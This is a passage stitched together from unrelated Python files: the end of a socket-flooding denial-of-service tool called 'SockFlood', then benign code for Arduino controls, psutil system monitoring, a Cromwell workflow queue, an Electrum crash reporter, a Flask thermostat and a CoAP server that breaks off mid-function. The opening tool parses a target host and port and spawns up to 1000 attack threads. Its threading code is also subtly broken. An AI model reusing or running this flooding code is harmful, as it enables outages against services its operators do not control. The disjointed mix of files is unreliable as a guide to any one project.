(+) attacks %AMOUNT% - Enter a custom amount of attack, Default 1000
(+) start - Will start attacking and display outputs on console
""")
if "host " in command:
self.host=command.replace("host ","").replace("https://", "").replace("http://", "").replace("www.", "")
print(Fore.WHITE+f"""
[+] Successfully Set Host as {self.host}
""")
elif "port " in command:
self.portnum=command.replace("port ","")
print(Fore.WHITE+f"""
[+] Successfully Set Port to {self.portnum}
""")
elif command=="start":
print(self.portnum)
if self.host and self.portnum:
if int(self.threads):
for i in range(1,int(self.threads)):
threading.Thread(target=self.start_attack(self.host,self.portnum)).start()
else:
for i in range(1,1000):
threading.Thread(target=self.start_attack(self.host,self.portnum)).start()
elif self.host and not self.portnum:
if int(self.threads):
for i in range(1,int(self.threads)):
threading.Thread(target=self.start_attack(self.host)).start()
else:
for i in range(1,1000):
threading.Thread(target=self.start_attack(self.host)).start()
elif "attacks " in command:
self.threads=command.replace("attacks ","")
print(Fore.WHITE+f"""
[+] Successfully Set Threads to {self.threads}
""")
def run(self):
self.graphics()
while True:
self.command_parser(input(Fore.CYAN+f"${os.environ.get('USERNAME')}$>> "))
if __name__=="__main__":
app=SockFlood()
app.run()
|
arduino_control_worker.py
|
import time
import json
import threading
import random
import socket
from nanpy import (SerialManager)
from nanpy.serialmanager import SerialManagerError
from nanpy.sockconnection import (SocketManager, SocketManagerError)
import sys
sys.path.append('..')
import variables
import importlib
#r = redis.Redis(host='127.0.0.1', port=6379)
class ArduinoControlWorker():
def __init__(self, config, main_thread_running, system_ready, node_connected, connection=None):
#self.config = {**config, **self.config}
self.config = config
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.controls_ready = False
self.node_connected = node_connected
self.connection = connection
self.controls = []
if node_connected.is_set():
self.init_controls()
self.controls_ready = True
return
def dynamic_import(self, path):
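        # Resolve a dotted path to an attribute, e.g. a (hypothetical) path
        # 'controls.arduino.relay_control.RelayControl' imports
        # controls.arduino.relay_control and returns its RelayControl class.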
components = path.split('.')
s = ''
for component in components[:-1]:
s += component + '.'
parent = importlib.import_module(s[:-1])
sensor = getattr(parent, components[-1])
return sensor
def init_controls(self):
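        # Each control entry is expected to look roughly like the following
        # (example values are hypothetical; keys match the lookups below):
        #   {'type': 'Relay', 'pin': 5, 'name': 'Pump', 'key': 'pump_1',
        #    'is_digital': True, 'topic': 'garden/pump'}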
try:
for control in self.config['controls']:
if control.get('type', None) is not None:
#Get the control from the controls folder {control name}_control.{ControlName}Control
control_type = 'controls.arduino.' + control.get('type').lower() + '_control.' + control.get('type').capitalize() + 'Control'
analog_pin_mode = False if control.get('is_digital', False) else True
imported_control = self.dynamic_import(control_type)
#new_control = imported_control(control.get('pin'), name=control.get('name', control.get('type')), connection=self.connection, key=control.get('key', None))
# Define default kwargs for all control types, conditionally include optional variables below if they exist
control_kwargs = {
'name' : control.get('name', control.get('type')),
'pin' : int(control.get('pin')),
'connection': self.connection,
'key' : control.get('key', None),
'analog_pin_mode': analog_pin_mode,
'topic': control.get('topic', None)
}
# optional control variables
# add conditional control vars here...
new_control = imported_control(**control_kwargs)
new_control.init_control()
self.controls.append(new_control)
print('{type} Control {pin}...\t\t\t\033[1;32m Ready\033[0;0m'.format(**control))
except (SerialManagerError, SocketManagerError, BrokenPipeError, ConnectionResetError, OSError, socket.timeout) as e:
# Connection error. Reset everything for reconnect
self.controls_ready = False
self.node_connected.clear()
self.controls = []
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
if self.node_connected.is_set():
if self.controls_ready:
try:
readings = {}
for control in self.controls:
result = control.read()
readings[control.key] = result
except (SerialManagerError, SocketManagerError, BrokenPipeError, ConnectionResetError, OSError, socket.timeout) as e:
print('\033[1;36m{name}\033[0;0m -> \033[1;33mControls Timeout!\033[0;0m'.format(**self.config))
self.controls_ready = False
self.controls = []
self.node_connected.clear()
time.sleep(15)
else:
# Worker connected but controls not initialized
self.init_controls()
self.controls_ready = True
else:
# Node not connected. Wait for reconnect
self.controls_ready = False
self.controls = []
time.sleep(10)
#Will this nuke the connection?
time.sleep(0.05)
        # This only runs after the main thread has shut down
print("{name} Controls Shutting Down...\t\033[1;32m Complete\033[0;0m".format(**self.config))
|
worker.py
|
# -*- coding: utf-8 -*-
import threading
from multiprocessing import Process, Event
import time
import psutil
class WorkerBase(object):
def __init__(self, mode="threading"):
        if mode not in ['threading', 'processing']:
raise ValueError("Bad mode.")
self._work_mode = mode
def work(self):
if self._work_mode == "threading":
self._running = True
self._worker = threading.Thread(target=self.run, args=(self._work_mode, self._running,))
            self._worker.daemon = True
else:
self._running = Event()
self._worker = Process(target=self.run, args=(self._work_mode, self._running,))
self._worker.daemon = True
self._running.set()
self._worker.start()
def exit(self, force=False):
if self._work_mode == "threading":
self._running = False
else:
self._running.clear()
if self.isOK():
self._worker.join()
return True
def beforeWork(self):
pass
def afterWork(self):
pass
def run(self, mode, status):
self.beforeWork()
if mode == "threading":
while self._running:
self.main()
else:
while status.is_set():
self.main()
self.afterWork()
def main(self):
        print(time.strftime("%H:%M:%S", time.localtime(int(time.time()))), "I'm working...")
time.sleep(1)
def isOK(self):
if self._work_mode == "threading":
            return self._worker.is_alive()
else:
return self._worker.is_alive()
class CPUWorker(WorkerBase):
"""采集cpu数据"""
def __init__(self, dashboard, mode="threading"):
super(CPUWorker, self).__init__(mode)
self._name = 'cpuWorker'
self._dashboard = dashboard
logger = dashboard.getLogger(self._name)
logger.info("cpuWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
"""
        Take an initial sample before collecting statistics; otherwise psutil's zero baseline makes the first reading come out as 0.
"""
psutil.cpu_count(logical=True)
psutil.cpu_count(logical=False)
psutil.cpu_percent()
psutil.cpu_times_percent()
psutil.cpu_freq().current
logger = self._dashboard.getLogger(self._name)
logger.info("{} is working now.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
        # logical core count
        logical_cnt = psutil.cpu_count(logical=True)
        # physical core count
        physics_cnt = psutil.cpu_count(logical=False)
        # current CPU utilization (%)
        cpu_current_use_rate = psutil.cpu_percent()
        # CPU time percentages by category
        typeT = psutil.cpu_times_percent()
        cpu_user_time = typeT.user  # time in user mode
        cpu_system_time = typeT.system  # time in system mode
        cpu_idle_time = typeT.idle  # idle time
        # current CPU frequency
        cpu_current_freq = psutil.cpu_freq().current
        # write the record to the database
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
record = {
'TIMESTAMP': int(time.time()),
'LOGICALCNT': logical_cnt,
'PHYSICSCNT': physics_cnt,
'USERATE': cpu_current_use_rate,
'USERTIME': cpu_user_time,
'SYSTEMTIME': cpu_system_time,
'IDLETIME': cpu_idle_time,
'FREQUENCY': cpu_current_freq
}
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
class MemoryWorker(WorkerBase):
def __init__(self, dashboard, mode='threading'):
super(MemoryWorker, self).__init__(mode=mode)
self._name = 'memoryWorker'
self._dashboard = dashboard
logger = dashboard.getLogger(self._name)
logger.info("memoryWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is start working.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
mem = psutil.virtual_memory()
        # total physical memory, in bytes
        mem_total = mem.total
        # memory utilization, in %
        mem_use_rate = mem.percent
        swap = psutil.swap_memory()
        # total swap size, in bytes
        swap_total = swap.total
        # swap utilization, in %
        swap_use_rate = swap.percent
        # bytes swapped in
        swap_sin = swap.sin
        # bytes swapped out
swap_sout = swap.sout
record = {
'TIMESTAMP': int(time.time()),
'MEMORYTOTAL': mem_total,
'MEMORYUSERATE': mem_use_rate,
'SWAPTOTAL': swap_total,
'SWAPUSERATE': swap_use_rate,
'SWAPSIN': swap_sin,
'SWAPSOUT': swap_sout
}
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
class DiskWorker(WorkerBase):
def __init__(self, dashboard, mode='threading'):
super(DiskWorker, self).__init__(mode=mode)
self._name = 'diskWorker'
self._dashboard = dashboard
logger = dashboard.getLogger(self._name)
logger.info("diskWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is start working.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
t = int(time.time())
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
hard_disks = psutil.disk_partitions(all=False)
for disk in hard_disks:
disk_device_name = disk.device
disk_mount_point = disk.mountpoint
disk_fstype = disk.fstype
point_info = psutil.disk_usage(disk_mount_point)
disk_total = point_info.total
disk_userate = point_info.percent
record = {
'TIMESTAMP': t,
'DEVICENAME': disk_device_name,
'MOUNTPOINT': disk_mount_point,
'FSTYPE': disk_fstype,
'TOTAL': disk_total,
'USERATE': disk_userate
}
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
if __name__ == "__main__":
    worker = WorkerBase(mode="processing")
worker.work()
def exitHandler(signum, frame):
worker.exit()
print "Worker is stop working now!"
exit()
import signal
signal.signal(signal.SIGINT, exitHandler)
signal.signal(signal.SIGTERM, exitHandler)
signal.signal(signal.SIGTSTP, exitHandler)
cnt = 10
while cnt != 0:
time.sleep(1)
if worker.isOK():
print "worker is working hard!"
else:
print "worker is not work now!"
if cnt == 5:
if worker.exit():
print "Make work stop."
cnt = cnt - 1
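# Minimal subclass sketch (illustrative; not part of the original module). Overriding main() is all a
# concrete worker needs, as CPUWorker/MemoryWorker/DiskWorker above do with a dashboard dependency:
#
#   class HeartbeatWorker(WorkerBase):
#       def main(self):
#           print("beat")
#           time.sleep(1)
#
#   hb = HeartbeatWorker(mode="threading")
#   hb.work()        # runs main() on a daemon thread until exit() is called
#   time.sleep(5)
#   hb.exit()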
|
queue_handler.py
|
import logging
from pathlib import Path
import time
from datetime import datetime
from queue import Queue
from threading import Thread, get_ident
from copy import deepcopy
import requests
from cromwell_tools.cromwell_api import CromwellAPI
from falcon import settings
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("falcon.{module_path}".format(module_path=__name__))
class Workflow(object):
"""A simple data structure for hosting workflow data.
    Besides supporting de-duplication, this class also keeps a smaller memory footprint than the raw workflow metadata.
"""
def __init__(self, workflow_id, bundle_uuid=None, bundle_version=None, labels=None):
self.id = workflow_id
self.bundle_uuid = bundle_uuid
self.bundle_version = bundle_version
if labels is None:
self.labels = {}
else:
self.labels = deepcopy(labels)
def __str__(self):
return str(self.id)
def __repr__(self):
return str(self.id)
def __eq__(self, other):
"""
Note: In the future, if we want to add advanced de-duplication feature to the service, besides asserting
workflow id between 2 `Workflow` objects, we might also want to check if they have the same `bundle_uuid`
and `bundle_version`.
"""
if isinstance(other, Workflow):
return self.id == other.id
return False
class QueueHandler(object):
"""
This is the queue handler component of the falcon.
    This handler is responsible for retrieving `On Hold` workflows from Cromwell, maintaining a queue instance and
    putting the workflows into the queue for the igniter to consume.
Args:
workflow_queue (queue.Queue): A queue object within the handler instance to host workflows.
thread (threading.Thread): A thread within the handler instance to execute the logic. By default it's set to
None. It should only be spawned by the function `spawn_and_start()`.
settings (dict): A dictionary contains all settings for the handler.
        queue_update_interval (int): How long the handler sleeps after each time it retrieves workflows from
            Cromwell.
        cromwell_query_dict (dict): The query dictionary the handler uses to retrieve workflows from Cromwell.
            Currently this is hard-coded.
"""
def __init__(self, config_path):
self.workflow_queue = self.create_empty_queue(
-1
) # use infinite for the size of the queue for now
self.thread = None
self.settings = settings.get_settings(config_path)
self.cromwell_auth = settings.get_cromwell_auth(self.settings)
self.queue_update_interval = self.settings.get("queue_update_interval")
self.cromwell_query_dict = self.settings.get("cromwell_query_dict")
def spawn_and_start(self):
"""
Starts the thread, which is an instance variable. If thread has not been created, spawns it and then starts it.
"""
if not self.thread:
self.thread = Thread(target=self.execution_loop, name="queueHandler")
self.thread.start()
def join(self):
"""
A wrapper function around `threading.Thread.join()`.
"""
try:
self.thread.join()
except (AttributeError, AssertionError):
logger.error("The thread of this queue handler is not in a running state.")
def execution_loop(self):
logger.info(
"QueueHandler | Initializing the queue handler with thread => {0} | {1}".format(
get_ident(), datetime.now()
)
)
while True:
self.report_my_status() # Execute first to generate new handler_status.html
self.execution_event()
def execution_event(self):
logger.info(
"QueueHandler | QueueHandler thread {0} is warmed up and running. | {1}".format(
get_ident(), datetime.now()
)
)
workflow_metas = self.retrieve_workflows(self.cromwell_query_dict)
if (
workflow_metas
): # This could happen when getting either non-200 codes or 0 workflow from Cromwell
workflows = self.prepare_workflows(workflow_metas)
# This must happen before `enqueue()` is called, so that each time the queue is refreshed and updated
self.set_queue(self.create_empty_queue(-1))
self.enqueue(workflows)
else:
logger.info(
"QueueHandler | Cannot fetch any workflow from Cromwell, go back to sleep and wait for next "
"attempt. | {0}".format(datetime.now())
)
self.sleep_for(self.queue_update_interval)
def retrieve_workflows(self, query_dict):
"""
Retrieve the latest list of metadata of all "On Hold" workflows from Cromwell.
Args:
query_dict (dict): A dictionary that contains valid query parameters which can be accepted by the Cromwell
/query endpoint.
Returns:
workflow_metas (None or list): Will be None if it gets a non 200 code from Cromwell, otherwise will be a
list of workflow metadata dict blocks. e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
"""
workflow_metas = None
query_dict["additionalQueryResultFields"] = "labels"
try:
response = CromwellAPI.query(auth=self.cromwell_auth, query_dict=query_dict)
if response.status_code != 200:
logger.warning(
"QueueHandler | Failed to retrieve workflows from Cromwell | {0} | {1}".format(
response.text, datetime.now()
)
)
else:
workflow_metas = response.json()["results"]
num_workflows = len(workflow_metas)
logger.info(
"QueueHandler | Retrieved {0} workflows from Cromwell. | {1}".format(
num_workflows, datetime.now()
)
)
logger.debug(
"QueueHandler | {0} | {1}".format(workflow_metas, datetime.now())
) # TODO: remove this or not?
except (
requests.exceptions.ConnectionError,
requests.exceptions.RequestException,
) as error:
logger.error(
"QueueHandler | Failed to retrieve workflows from Cromwell | {0} | {1}".format(
error, datetime.now()
)
)
finally:
return workflow_metas
def prepare_workflows(self, workflow_metas):
"""
        This function will figure out the correct order of the workflow metadata objects, parse them and convert them
        into an iterator that yields assembled `Workflow` objects.
Args:
workflow_metas (list): A list of workflow metadata dict blocks. e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
Returns:
workflows_iterator (map iterator): An iterator that applies `_assemble_workflow()` to every item of
the workflow_metas, yielding the result `Workflow` instance.
"""
if not self.is_workflow_list_in_oldest_first_order(workflow_metas):
workflow_metas = workflow_metas[::-1]
workflows_iterator = map(self._assemble_workflow, workflow_metas)
return workflows_iterator
def enqueue(self, workflows):
"""
Put workflows into the in-memory queue object, which is an instance variable.
Args:
workflows (iterable): An iterable(list or iterator) object that contains all `Workflow` instances that need
to be put in the in-memory queue.
"""
for workflow in workflows:
logger.debug(
"QueueHandler | Enqueuing workflow {0} | {1}".format(
workflow, datetime.now()
)
)
self.workflow_queue.put(
workflow
) # TODO: Implement and add de-duplication logic here
def set_queue(self, queue):
"""
Move the reference from the old queue to the new object to maintain the pointer integrity for the instance
variable `self.workflow_queue`. Make this a separate function so it's easier to test.
Args:
queue: A reference to a new concrete queue object which will replace the current one.
"""
self.workflow_queue = queue
@staticmethod
def create_empty_queue(max_queue_size=-1):
"""
This function works as a factory which returns a concrete Queue object. Modifying this function gives you
the ability to plug in different implementations of Queue object for the `QueueHandler` instances.
Args:
max_queue_size (int): For the current `queue.Queue()` implementation, this field is an integer that sets
the upperbound limit on the number of items that can be placed in the queue. Insertion will block once
this size has been reached, until queue items are consumed. If maxsize is less than or equal to zero,
the queue size is infinite.
Returns:
queue.Queue: A concrete `Queue` instance.
"""
return Queue(maxsize=max_queue_size)
@staticmethod
def _assemble_workflow(workflow_meta):
"""
This is a helper function that parses a block of workflow metadata object and assembles it to a `Workflow`
instance.
Args:
workflow_meta (dict): A dictionary that contains the metadata of a workflow, usually this is returned from
Cromwell and parsed by JSON utils. An example block would look like:
```
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
}
```
Returns:
Workflow: A concrete `Workflow` instance that has necessary properties.
"""
workflow_id = workflow_meta.get("id")
workflow_labels = workflow_meta.get("labels")
workflow_bundle_uuid = (
workflow_labels.get("bundle-uuid")
if isinstance(workflow_labels, dict)
else None
)
workflow_bundle_version = (
workflow_labels.get("bundle-version")
if isinstance(workflow_labels, dict)
else None
)
workflow = Workflow(
workflow_id, workflow_bundle_uuid, workflow_bundle_version, workflow_labels
)
return workflow
@staticmethod
def is_workflow_list_in_oldest_first_order(workflow_list):
"""
        This function will figure out how the `workflow_list` is sorted.
        From Cromwell v34 (https://github.com/broadinstitute/cromwell/releases/tag/34), query results are
        returned in reverse chronological order, with the most-recently submitted workflows returned first, which
        differs from the behavior of older versions.
Args:
workflow_list (list): A list of workflow metadata objects, e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
Returns:
bool: The return value. True if the workflow_list is sorted oldest first, False otherwise.
"""
CROMWELL_DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
try:
head = datetime.strptime(
str(workflow_list[0].get("submission")), CROMWELL_DATETIME_FORMAT
)
tail = datetime.strptime(
str(workflow_list[-1].get("submission")), CROMWELL_DATETIME_FORMAT
)
return head <= tail
except ValueError:
logger.error(
"Queue | An error happened when try to parse the submission timestamps, will assume oldest first "
"for"
" the workflows returned from Cromwell | {0}".format(datetime.now())
)
return True
@staticmethod
def sleep_for(sleep_time):
time.sleep(sleep_time)
@staticmethod
def shallow_deduplicate():
"""A placeholder function for de-duplication logic, not implemented yet.
This shallow de-duplication should only search given bundle-uuid and bundle-version in the current domain,
e.g. notifications in the queue.
"""
return NotImplemented
@staticmethod
def deep_deduplicate():
"""A placeholder function for de-duplication logic, not implemented yet.
This deep de-duplication should search the given bundle-uuid and bundle-version in the whole history.
"""
return NotImplemented
@staticmethod
def report_my_status():
"""
        Write a status HTML file (settings.docRootFile) containing the timestamp of when it ran
"""
try:
# Get timestamp now
# Converting datetime object to string
dateTimeObj = datetime.now()
timestampStr = dateTimeObj.strftime("%d-%b-%Y (%H:%M:%S)")
# Get filename full path and creates it
path = Path(settings.docRootPath)
path.mkdir(parents=True, exist_ok=True)
filename = path.joinpath(settings.docRootFile)
# create and update handler_status.html with time so we can get the info from a curl
with filename.open("w") as f:
# content of html file with timestamp
header = """<html><br><head></head><br><body><br><p>
"""
body = "Time when report my status was generated: " + timestampStr
footer = """
</p><br></body><br></html>"""
f.write("{0}{1}{2}".format(header, body, footer))
logger.info("QueueHandler | QueueHandler report status ran successfully ")
except Exception as exc:
logger.warning(
"QueueHandler | QueueHandler report Status failed with Exception: | {0}".format(
exc
)
)
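# Usage sketch (illustrative; 'config.json' and the falcon settings it would contain are assumptions):
#
#   handler = QueueHandler('config.json')
#   handler.spawn_and_start()        # polls Cromwell for 'On Hold' workflows on a background thread
#   # an igniter component would consume Workflow objects from handler.workflow_queue here
#   handler.join()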
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://electrum.crashhub.tachacoin.tech"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["986c", "4222"] and ".tachacoin.tech" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
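# Subclassing sketch (illustrative; a real GUI reporter would ask the user instead of returning constants).
# Uses the module's existing `sys` import:
#
#   class HeadlessCrashReporter(BaseCrashReporter):
#       def get_user_description(self):
#           return "automated report"
#       def get_wallet_type(self):
#           return "standard"
#
#   try:
#       1 / 0
#   except ZeroDivisionError:
#       reporter = HeadlessCrashReporter(*sys.exc_info())
#       print(reporter.get_report_string())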
|
main.py
|
'Smart thermostat project main module'
from queue import Queue
from flask import Flask, jsonify, render_template, request, Response
import json
import threading
try:
from rpi.sensor import Sensor
from rpi.relay import Relay
import board
HEAT_PIN = board.D21
FAN_PIN = board.D16
COOL_PIN = board.D12
except ModuleNotFoundError:
from mock.sensor import Sensor
from mock.relay import Relay
HEAT_PIN = FAN_PIN = COOL_PIN = None
from thermocontroller import ThermoController
from scheduler import Scheduler
WEATHER_QUERY = 'zip=94549'
TEMP_CHANGE_INCREMENT = 0.1
DEFAULT_DESIRED_TEMP = 21.0
BUTTON_REPEAT_DELAY_SECS = 0.3
controller = ThermoController(WEATHER_QUERY, Sensor(),
heater=Relay('Heat', HEAT_PIN), cooler=Relay('AC', COOL_PIN),
fan=Relay('Fan', FAN_PIN), desired_temp=DEFAULT_DESIRED_TEMP)
scheduler = Scheduler(controller)
app = Flask(__name__)
@app.route('/')
def index():
return render_template(
'index.html', weather_query=WEATHER_QUERY.split('=')[1],
schedule=scheduler.render())
@app.route('/increase_temperature', methods=('POST',))
def increase_temperature():
controller.increase_temperature(float(request.get_data()))
return ''
@app.route('/set_temperature', methods=('PUT',))
def set_temperature():
controller.set_temperature(float(request.get_data()))
return ''
@app.route('/activate_fan', methods=('PUT',))
def activate_fan():
controller.activate_fan(request.get_data() == b'true')
return ''
@app.route('/enable_cool', methods=('PUT',))
def enable_cool():
controller.enable_cool(request.get_data() == b'true')
return ''
@app.route('/schedule', methods=('PUT',))
def schedule():
scheduler.set(request.get_data())
return ''
@app.route('/status')
def status():
stream_state_queue = Queue(maxsize=5)
controller.add_listener(stream_state_queue)
def event_stream():
while True:
state = stream_state_queue.get()
yield 'data: {}\n\n'.format(json.dumps(state))
return Response(event_stream(), mimetype="text/event-stream")
@app.route('/all-status')
def all_status():
return jsonify(controller.status_history)
def _background_thread():
while True:
scheduler.update()
controller.update()
threading.Thread(target=_background_thread).start()
app.run(host='0.0.0.0', threaded=True, debug=True, use_reloader=False)
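# Client sketch for the /status server-sent-events endpoint (illustrative; assumes the app above is
# reachable at http://localhost:5000 and that the 'requests' package is installed):
#
#   import json, requests
#   with requests.get('http://localhost:5000/status', stream=True) as resp:
#       for line in resp.iter_lines():
#           if line.startswith(b'data: '):
#               print(json.loads(line[len(b'data: '):]))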
|
coap.py
|
import logging
import logging.config
import os
import random
import re
import socket
import threading
import xml.etree.ElementTree as ElementTree
import struct
from coapclient import HelperClient
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.resources.remoteResource import RemoteResource
from coapthon.utils import Tree, create_logging
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.request import Request
from coapthon.layers.messagelayer import MessageLayer
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
def __init__(self, server_address, multicast=False, starting_mid=None):
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge = threading.Thread(target=self.purge)
self.purge.start()
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if self.multicast: # pragma: no cover
# Create a socket
self._socket = socket.socket(addrinfo[1], socket.SOCK_DGRAM)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind it to the port
self._socket.bind(('', self.server_address[1]))
group_bin = socket.inet_pton(addrinfo[1], addrinfo[4][0])
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
else:
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
